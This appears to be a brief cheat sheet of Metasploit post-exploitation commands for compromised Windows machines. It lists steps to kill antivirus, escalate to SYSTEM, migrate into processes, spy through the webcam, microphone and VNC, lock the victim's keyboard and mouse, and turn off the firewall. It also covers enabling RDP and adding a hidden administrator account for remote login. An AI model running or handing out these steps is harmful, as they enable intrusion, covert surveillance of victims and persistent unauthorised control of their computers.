Skip to main content


Generally things we do after exploitation are:

use post/windows/manage/killav
getsystem # tries to become admin (privesc)
migrate id # where id can be the explorer process or a more stable process
# after a while we can do
run vnc -i # to start a vnc session
webcam_list # lists webcam
uictl disable keyboard # disables keyboard
uictl enable keyboard  # enables keyboard
uictl disable mouse    # disables mouse
uictl enable mouse     # enables mouse
record_mic # records microphone
idletime # for how much time the use has been idle

We can also disable the firewall by doing:

shell # to drop into a windows shell
netsh advfirewall set currentprofile state off

We can also enable RDP:

run post/windows/manage/enable_rdp

In order to use RDP wthout interfering with other users We can create a new user with:

net user gnebbia rand0mP4assword /add

And we can set this user as administrator with:

net localgroup administrators gnebbia /add

Now from our attacking machine we can connect to target via RDP by doing:

rdesktop -u gnebbia -p rand0mP4assword <target_ip>:3389